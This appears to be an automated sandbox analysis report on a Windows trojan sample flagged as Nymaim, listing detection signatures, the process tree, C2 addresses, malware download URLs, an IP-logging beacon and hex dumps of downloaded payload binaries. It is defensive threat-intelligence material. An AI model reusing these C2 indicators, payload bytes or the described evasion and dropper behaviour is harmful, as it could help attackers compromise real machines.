Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:file.exe
Analysis ID:715150
MD5:a3b774ed5023f56970eea0668ae65703
SHA1:3aebfec7980d1db1edbeccbb29044ea677be304b
SHA256:f4f6bcce8531ffa055776e57b0f650b7f87049808e3b29d65fab79ec841ed81c
Tags:exe
Infos:

Detection

Nymaim
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Nymaim
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Binary is likely a compiled AutoIt script file
Machine Learning detection for sample
May check the online IP address of the machine
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
One or more processes crash
May sleep (evasive loops) to hinder dynamic analysis
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Found dropped PE file which has not been started or loaded
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Downloads executable code via HTTP
Enables debug privileges
Drops files with a non-matching file extension (content does not match file extension)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Drops PE files
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 5380 cmdline: C:\Users\user\Desktop\file.exe MD5: A3B774ED5023F56970EEA0668AE65703)
    • WerFault.exe (PID: 5700 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 528 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 5208 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 700 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 5604 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 732 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 5676 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 744 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 5944 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 776 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 4600 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 900 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 4760 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 964 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 5716 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 1152 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 1332 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 1280 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • cmd.exe (PID: 5252 cmdline: C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • Cleaner.exe (PID: 5272 cmdline: "C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe" MD5: 04514BD4962F7D60679434E0EBE49184)
    • WerFault.exe (PID: 3940 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5380 -s 1272 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

Threatname: Nymaim

{"C2 addresses": ["208.67.104.97", "85.31.46.167"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000000.261344459.0000000000710000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_NymaimYara detected NymaimJoe Security
    00000000.00000000.261344459.0000000000710000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
    • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
    00000000.00000000.271765385.0000000000710000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_NymaimYara detected NymaimJoe Security
      00000000.00000000.271765385.0000000000710000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
      • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
      00000000.00000000.266126410.000000000078A000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
      • 0x1038:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
      Click to see the 60 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.3.file.exe.2210000.0.raw.unpackJoeSecurity_NymaimYara detected NymaimJoe Security
        0.0.file.exe.710e67.8.unpackJoeSecurity_NymaimYara detected NymaimJoe Security
          0.0.file.exe.400000.7.raw.unpackJoeSecurity_NymaimYara detected NymaimJoe Security
            0.0.file.exe.710e67.6.unpackJoeSecurity_NymaimYara detected NymaimJoe Security
              0.0.file.exe.400000.3.raw.unpackJoeSecurity_NymaimYara detected NymaimJoe Security
                Click to see the 45 entries

                Sigma Signatures

                No Sigma rule has matched

                Snort Signatures

                No Snort rule has matched

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for submitted file
                Source: file.exeReversingLabs: Detection: 47%
                Antivirus detection for URL or domain
                Source: http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&substream=mixinteURL Reputation: Label: malware
                Source: http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=mixtwo&substream=mixinteURL Reputation: Label: malware
                Source: http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&substURL Reputation: Label: malware
                Source: http://171.22.30.106/library.phpURL Reputation: Label: malware
                Multi AV Scanner detection for domain / URL
                Source: http://85.31.46.167/software.phpZVirustotal: Detection: 5%Perma Link
                Multi AV Scanner detection for dropped file
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\soft[1]ReversingLabs: Detection: 28%
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: 00000000.00000000.271765385.0000000000710000.00000040.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Nymaim {"C2 addresses": ["208.67.104.97", "85.31.46.167"]}
                Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                Source: unknownHTTPS traffic detected: 148.251.234.83:443 -> 192.168.2.3:49723 version: TLS 1.2
                Source: Binary string: [C:\zakalajoviziw83\mali-xaduvovije95\bahowe\51\xayiziket\fov.pdbPXC-@ source: file.exe
                Source: Binary string: C:\zakalajoviziw83\mali-xaduvovije95\bahowe\51\xayiziket\fov.pdb source: file.exe

                Networking

                barindex
                May check the online IP address of the machine
                Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exeDNS query: name: iplogger.org
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorIPs: 208.67.104.97
                Source: Malware configuration extractorIPs: 85.31.46.167
                Source: Joe Sandbox ViewASN Name: GRAYSON-COLLIN-COMMUNICATIONSUS GRAYSON-COLLIN-COMMUNICATIONSUS
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: Joe Sandbox ViewIP Address: 148.251.234.83 148.251.234.83
                Source: Joe Sandbox ViewIP Address: 148.251.234.83 148.251.234.83
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 03 Oct 2022 15:32:32 GMTServer: Apache/2.4.41 (Ubuntu)Pragma: publicExpires: 0Cache-Control: must-revalidate, post-check=0, pre-check=0Cache-Control: privateContent-Disposition: attachment; filename="dll";Content-Transfer-Encoding: binaryContent-Length: 242176Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4a 6c ef 58 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 a8 03 00 00 08 00 00 00 00 00 00 2e c6 03 00 00 20 00 00 00 e0 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 c5 03 00 57 00 00 00 00 e0 03 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 a6 03 00 00 20 00 00 00 a8 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 10 04 00 00 00 e0 03 00 00 06 00 00 00 aa 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 04 00 00 02 00 00 00 b0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 c6 03 00 00 00 00 00 48 00 00 00 02 00 05 00 a0 60 02 00 34 65 01 00 01 00 00 00 00 00 00 00 90 55 01 00 10 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7d 00 59 00 79 00 3d 00 7b 00 58 00 78 00 3d 00 8a 72 93 00 00 70 04 6f 32 00 00 0a 8c 6f 00 00 01 28 33 00 00 0a 02 04 6f 32 00 00 0a 7d 05 00 00 04 2a 3a 02 03 73 01 00 00 06 04 28 02 00 00 06 2a 1e 17 80 06 00 00 04 2a 32 72 df 00 00 70 28 3b 00 00 0a 26 2a 56 72 a8 0f 00 70 80 07 00 00 04 72 a8 0f 00 70 80 08 00 00 04 2a 1e 02 28 1f 00 00 0a 2a 3e 02 fe 15 06 00 00 02 02 03 7d 09 00 00 04 2a be 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 28 45 00 00 0a 7d 09 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 47 00 00 0a 26 2a 3e 02 fe 15 07 00 00 02 02 03 7d 0e 00 00 04 2a aa 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 7d 0e 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 48 00 00 0a 26 2a 22 02 fe 15 08 00 00 02 2a 3e 02 fe 15 09 00 00 02 02 03 7d 18 00 00 04 2a 52 02 03 7d 20 00
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 03 Oct 2022 15:32:33 GMTServer: Apache/2.4.41 (Ubuntu)Pragma: publicExpires: 0Cache-Control: must-revalidate, post-check=0, pre-check=0Cache-Control: privateContent-Disposition: attachment; filename="soft";Content-Transfer-Encoding: binaryContent-Length: 3947920Keep-Alive: timeout=5, max=99Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f1 9a e4 ea 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 e4 14 00 00 0c 00 00 00 00 00 00 a6 02 15 00 00 20 00 00 00 20 15 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 15 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 02 15 00 4f 00 00 00 00 20 15 00 32 09 00 00 00 00 00 00 00 00 00 00 00 28 3c 00 90 15 00 00 00 40 15 00 0c 00 00 00 38 02 15 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ac e2 14 00 00 20 00 00 00 e4 14 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 32 09 00 00 00 20 15 00 00 0a 00 00 00 e6 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 15 00 00 02 00 00 00 f0 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 02 15 00 00 00 00 00 48 00 00 00 02 00 05 00 68 81 00 00 40 45 00 00 01 00 00 00 54 00 00 06 a8 c6 00 00 90 3b 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 13 00 00 0a 2a 1e 02 28 13 00 00 0a 2a ae 7e 01 00 00 04 2d 1e 72 01 00 00 70 d0 03 00 00 02 28 14 00 00 0a 6f 15 00 00 0a 73 16 00 00 0a 80 01 00 00 04 7e 01 00 00 04 2a 1a 7e 02 00 00 04 2a 1e 02 80 02 00 00 04 2a 6a 28 03 00 00 06 72 3d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 4d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 b7 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 cb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 d9 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 eb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 1f 01 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 1a 7e 03 00 00 04 2
                Source: global trafficHTTP traffic detected: GET /1Pz8p7 HTTP/1.1User-Agent: Mozilla/5.0 (Linux; Android 9; SM-G973U Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Mobile Safari/537.36Host: iplogger.orgConnection: Keep-Alive
                Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                Source: unknownTCP traffic detected without corresponding DNS query: 208.67.104.97
                Source: unknownTCP traffic detected without corresponding DNS query: 208.67.104.97
                Source: unknownTCP traffic detected without corresponding DNS query: 208.67.104.97
                Source: unknownTCP traffic detected without corresponding DNS query: 208.67.104.97
                Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                Source: unknownTCP traffic detected without corresponding DNS query: 85.31.46.167
                Source: file.exe, 00000000.00000000.306032693.000000000019B000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&subst
                Source: file.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.314526683.000000000085F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.31.46.167/software.php
                Source: file.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.314526683.000000000085F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.31.46.167/software.php$
                Source: file.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.31.46.167/software.phpCoo
                Source: file.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.314526683.000000000085F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.31.46.167/software.phpO
                Source: file.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.31.46.167/software.phpP
                Source: file.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.314526683.000000000085F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.31.46.167/software.phpZ
                Source: file.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.314526683.000000000085F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.31.46.167/software.phpl
                Source: file.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.314526683.000000000085F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.31.46.167/software.phpll
                Source: file.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.314526683.000000000085F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.31.46.167/software.phpstem32
                Source: file.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.314526683.000000000085F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.31.46.167/software.phpx
                Source: Cleaner.exe, 00000021.00000002.650563112.0000024B1A9C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: Cleaner.exe, 00000021.00000003.379618679.0000024B7E186000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.378593000.0000024B7E185000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.383731927.0000024B7E1C4000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.379712996.0000024B7E18F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://en.w
                Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
                Source: Cleaner.exe, 00000021.00000002.645497591.0000024B00418000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://iplogger.org
                Source: Cleaner.exe, 00000021.00000002.640280019.0000024B00001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: Amcache.hve.30.drString found in binary or memory: http://upx.sf.net
                Source: Cleaner.exe, 00000021.00000003.396394419.0000024B7E19D000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.395554408.0000024B7E186000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.396105393.0000024B7E19D000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.395852274.0000024B7E19D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.agfamonotype.
                Source: Cleaner.exe, 00000021.00000003.382564725.0000024B7E1C2000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: Cleaner.exe, 00000021.00000003.387478626.0000024B7E190000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.387275120.0000024B7E190000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ascendercorp.com/typedesigners.htmled.
                Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                Source: file.exe, 00000000.00000003.345054992.0000000003940000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.344736668.0000000003746000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.315966725.00000000031F7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.349013396.0000000003B83000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.344047493.0000000003935000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.343086335.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.315735295.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316522296.0000000003248000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316150109.00000000031F7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.347627811.000000000374D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.342413106.0000000003927000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.349485189.000000000374C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.344369058.0000000003B27000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316216498.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316046017.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.341121429.0000000003749000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.343503756.000000000374B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.346281710.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.348412954.000000000396A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316402159.00000000031F7000.00000004.00000800.00020000.00000000.sdmp, soft[1].0.drString found in binary or memory: http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174
                Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                Source: Cleaner.exe, 00000021.00000003.391426565.0000024B7E1C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                Source: Cleaner.exe, 00000021.00000003.391036732.0000024B7E1C2000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.391426565.0000024B7E1C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/
                Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                Source: Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                Source: Cleaner.exe, 00000021.00000003.402175756.0000024B7E1C2000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.404838301.0000024B7E1C5000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.405253003.0000024B7E1C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designerseK
                Source: Cleaner.exe, 00000021.00000003.391186193.0000024B7E1C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersers
                Source: Cleaner.exe, 00000021.00000003.391552464.0000024B7E1C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersp
